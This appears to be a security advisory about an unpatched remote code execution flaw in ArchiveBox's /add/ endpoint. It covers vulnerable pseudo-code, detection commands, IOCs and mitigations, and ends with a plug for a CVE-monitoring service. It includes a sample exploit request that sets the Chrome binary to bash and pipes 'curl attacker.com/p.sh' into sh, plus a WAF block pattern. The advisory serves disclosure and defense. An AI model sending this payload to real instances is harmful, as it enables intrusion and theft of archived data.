ArchiveBox CVE-2026-42601: RCE via /add/ — No Patch Available (CVSS 9.8)

ArchiveBox is an ultra-popular open-source web archiving tool widely used by indie hackers, archivists, and research teams — it saves web pages locally along with their assets, screenshots, PDFs, WARC, etc. CVE-2026-42601 (CVSS 9.8) reveals a critical vulnerability in its /add/ endpoint: a JSON config field sent by the user is merged into the crawl configuration without validation, then exported as environment variables to archive plugins. Result: arbitrary argument injection and remote code execution.

The painful detail: no official patch is available to date. All versions ≤ 0.8.6rc0 are vulnerable, and the only viable mitigation is to isolate or pull the service until a fix lands.

Technical Details

Vulnerable component

ArchiveBox exposes a web UI to add new URLs for archiving. The /add/ endpoint (the AddView in core/views.py) accepts a JSON config field originally intended to let an admin customize crawl behavior per URL (timeout, user-agent, etc.).

The problem: this JSON is merged directly into the global config without sanitization. Then, when archive plugins run (wget, youtube-dl, chrome --headless, singlefile, etc.), the resulting config is exported as environment variables to the child process.

Exploitation path

# Reconstructed pseudo-code — vulnerable pattern
def AddView(request):
    url = request.POST.get("url")
    user_config = json.loads(request.POST.get("config", "{}"))
    
    crawl_config = {**DEFAULT_CONFIG, **user_config}  # ⚠️ unvalidated merge
    
    for plugin in plugins:
        env = {k.upper(): str(v) for k, v in crawl_config.items()}  # ⚠️ every key becomes an env var
        subprocess.run([plugin.command, url], env=env)

An attacker sends a POST:

{
  "url": "https://example.com",
  "config": {
    "CHROME_BINARY": "/usr/bin/bash",
    "CHROME_ARGS": "-c 'curl attacker.com/p.sh | sh'"
  }
}

The Chrome plugin receives these env vars and, instead of launching the browser, runs bash with the payload.

Characteristics

Field	Value
CVSS 3.1	9.8 (CRITICAL)
Vector	`AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
CWE	CWE-78 (OS Command Injection) + CWE-454 (External Initialization of Trusted Variables)
Authentication	None by default on public deployments
Fix status	❌ No official patch available

Affected Products and Versions

Product	Affected versions	Patched version
ArchiveBox	≤ 0.8.6rc0 (all current versions)	❌ None

Check your version:

# Docker
docker exec archivebox archivebox version

# Pip
pip show archivebox | grep Version

Exploitation and Impact

Real exposure surface

Many ArchiveBox instances are publicly exposed without authentication:

Personal hosting by amateur archivists
University libraries running ArchiveBox as a private Wayback Machine
Community platforms (web memory, citizen journalism)

A Shodan/Censys scan regularly shows thousands of reachable instances. All are immediately exploitable.

Post-exploitation impact

RCE inside the ArchiveBox container/host: filesystem access, stored archives access
Theft of archived data: for journalistic or research content, this can include sensitive sources, documented leaks
LAN pivot: ArchiveBox often runs on a homelab or shared VPS
Botnet recruitment / cryptomining: CPU is plentiful given the crawl workload

Public exploit

No detailed public PoC yet, but the exploit is trivial given the public description. Expect 24-48h before automated scanners catch up.

Detection and IOCs

ArchiveBox logs

# Hunt /add/ calls with non-standard config JSON bodies
grep -E "POST /add" /var/log/archivebox/access.log | \
  grep -E "config.*CHROME|config.*BINARY|config.*PATH"

System logs

# Processes started by ArchiveBox with unexpected binaries
ps -ef | grep -i "archivebox" | grep -vE "wget|chrome|python|node"

# Suspicious env vars injected into child processes
# (inspect via /proc)
for pid in $(pgrep -P $(pgrep archivebox)); do
  cat /proc/$pid/environ 2>/dev/null | tr '\0' '\n' | grep -iE "binary|command|args"
done

Indicators of compromise

Unexpected outbound connections from the ArchiveBox container/host
Binary files appearing in /tmp, /var/tmp, /dev/shm
Crontab or systemd service modifications
Abnormal network traffic to non-archived destinations

Mitigation — Without an Official Patch

Option 1 — Immediate network isolation

If your ArchiveBox is internet-exposed:

# Block all incoming HTTP requests outside the LAN
sudo ufw deny in 8000/tcp
sudo ufw allow from 192.168.1.0/24 to any port 8000

# Or via Docker
# Update docker-compose to bind on 127.0.0.1 only
ports:
  - "127.0.0.1:8000:8000"

Then reload:

docker compose up -d

Option 2 — Force authentication

ArchiveBox supports basic auth. Verify it's enabled:

# ArchiveBox config
archivebox config --set PUBLIC_INDEX=False
archivebox config --set PUBLIC_ADD_VIEW=False
archivebox config --set REQUIRE_LOGIN=True

Then create an admin account if not done:

archivebox manage createsuperuser

⚠️ This is a partial mitigation: an attacker who guesses or phishes an admin account can still exploit.

Option 3 — Reverse proxy with WAF

If you must keep public exposure (not recommended), put Nginx + ModSecurity in front:

location /add/ {
    # Block requests containing suspect patterns in the JSON body
    if ($request_body ~ "(_BINARY|_COMMAND|_ARGS|PATH|/bin/|/usr/bin/)") {
        return 403;
    }
    proxy_pass http://archivebox:8000;
}

Option 4 — Pull the service

For production instances holding sensitive data: shut down the service until the ArchiveBox team ships an official patch. It's painful but the only option that fully eliminates the risk.

docker compose stop archivebox

Proactive watch

Subscribe to the ArchiveBox GitHub repo to be notified the moment a patch lands:

https://github.com/ArchiveBox/ArchiveBox/releases

Why Continuous Monitoring of Self-Hosted Stacks Matters

Self-hosted tools (ArchiveBox, Vaultwarden, Bitwarden CE, Jellyfin, Nextcloud, Gitea…) are massively deployed in homelabs and SMBs, often without security visibility. A CVE like CVE-2026-42601 — no patch, no wide announcement, no CISA KEV — can go unnoticed for weeks while being trivially exploitable.

With cveo.tech, inventory your self-hosted services alongside your core systems and get automatic alerts the moment a critical CVE targets one of your exact versions — even when the upstream maintainer stays quiet, your watch is current.